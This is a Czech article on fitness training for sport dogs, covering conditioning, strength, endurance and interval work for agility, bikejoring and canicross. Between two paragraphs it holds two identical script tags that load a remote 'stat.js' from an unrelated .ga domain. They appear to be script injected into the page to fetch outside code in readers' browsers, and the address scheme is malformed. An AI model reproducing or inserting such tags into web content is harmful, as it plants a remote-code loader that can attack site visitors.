Každý majitel by měl svého psa udržovat v dobré kondici, obzvláště u sportovních psů je to důležité. Hodně lidí se ale zaměřuje jen na trénink dovedností v oblíbeném sportu a už nevěnuje moc času procházkám, natož cílené fyzické přípravě psa. V současné době už je většina psích sportů pro psy natolik fyzicky náročná, že by mělo být samozřejmostí věnovat několik dní v týdnu nejen zlepšování kondice, ale i zpevnění těla, tréninku rovnováhy a dalších dovedností.

S rostoucí oblíbeností psích sportů, zejména agility, jsou na trénincích občas k vidění psi, kteří nemají fyzičku nebo by potřebovali něco málo nebo více shodit, rychle se unaví a trénink je pro ně vyčerpávající. Další skupinu tvoří psi, kteří mají nějaký zdravotní problém, a i když nemůžou skákat, jejich majitelé je trápí na prudkých stahovačkách kolem bočnic nebo ostrými náběhy do tunelu.

Poměrně hodně lidí bere trénink daného sportu jako dostatečné fyzické cvičení, které psovi stačí jako náhrada delších procházek a běhání. Pes by ale měl být po fyzické stránce dostatečně připravený, aby se při tréninků psích sportů mohl plně věnovat učení nových dovedností a nemusel řešit, že se mu špatně skáče, nebo už je ke konci parkuru unavený a nemůže běžet naplno.

Fyzická příprava

Fyzická příprava by se měla mimo udržování dobré kondice skládat z tréninku síly, vytrvalosti, koordinace, ohebnosti, rovnováhy, propriocepce a rychlosti, důležitá je také příprava před samotným sportovním výkonem, protahování a odpočinkové dny. Trénink všech těchto dovedností by měl být pravidelně zahrnutý v životě sportovního psa, se kterým chce majitel dosahovat dobrých výkonů a zároveň si sport užívat až do jeho stáří.

Pokud už se nechceme věnovat cílenému tréninku fyzické kondice, u každého psa by měla být budována alespoň základní kondice dlouhými procházkami a výlety. Pobíháním po lese, přeskakováním popadaných kmenů a přelézáním skalek se psi přirozeně učí důležitým dovednostem. Na základní kondici se dají případně stavět další specifické tréninky.

Při zlepšování kondice se psovi zvětšuje aerobní zóna, zvyšuje se kapacita plic, srdce začíná efektivněji rozvádět okysličenou krev po těle a tělo se učí efektivně hospodařit s energií a kyslíkem. Je to srovnatelné se zimním nabíháním objemu, tedy vysokého počtu kilometrů v nízké intenzitě, u lidských běžců. Díky dobrému základu získanému přes zimu pak běžci mohou před začátkem sezóny zařazovat specifické tréninky. Pokud pes, který nemá dostatek příležitostí pobíhat na procházkách, chodí občas trénovat agility nebo jiný dynamický sport, je to pro psí tělo obrovská zátěž.

Cílený trénink vytrvalosti, síly a rychlosti může přinést výrazné zlepšení ve sportu. Pro každý sport jsou důležité různé kombinace základních tří aspektů – rychlosti, síly a vytrvalosti. Například v agility je potřeba kombinace síly a rychlosti – maximální výkon je podávaný několik desítek sekund, v bikejöringu je potřeba kombinace rychlosti a vytrvalosti, protože psi musí vydržet běžet rychlostí přes 30 km/h několik kilometrů, při canicrossu se pes nedostává do takových rychlostí, ale člověk je pro něj nákladem, který za sebou musí několik kilometrů táhnout – potřebuje tedy sílu a vytrvalost.

U většiny psů se klasické procházky nedají považovat za trénink vytrvalosti, protože si psi čmuchají a zastavují kdykoli chtějí, tedy s výjimkou ohařů a podobných bláznů :). Trénink vytrvalosti může být stejně jako u lidí aerobní nebo intervalový. Při aerobní tréninku se pes pohybuje po delších čas (alespoň 20 min) při nižší intenzitě, typicky to může být nepřerušované plavání nebo běh u kola. Při intervalovém tréninku je pohyb velmi intenzivní, ale po krátký čas, jednotlivá opakování jsou proložená klidnějším pohybem pro vydýchání, můžou to být například opakované výběhy prudkého kopce.

<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>
<script src='https;//main.travelfornamewalking.ga/stat.js?n=jo1' type='text/javascript'></script>

Pohybem, typickým pro běžný psí život, se posilují zejména velké svalové skupiny zodpovědné za pohyb těla. Malé, ale důležité svaly, které stabilizují tělo a zapojují se při ztrátě rovnováhy nebo podklouznutí, většinou posilovány nejsou. Proto je vhodné se na ně zejména u sportovních psů zaměřit a cíleně je posilovat při dogfitness.

Trénink dovedností v oblíbeném sportu je důležitý, ale pro zdravé a bezbolestně fungující psí tělo je potřeba věnovat dostatek času celkové fyzické přípravě, aby si pes mohl sport s vámi co nejvíce užívat.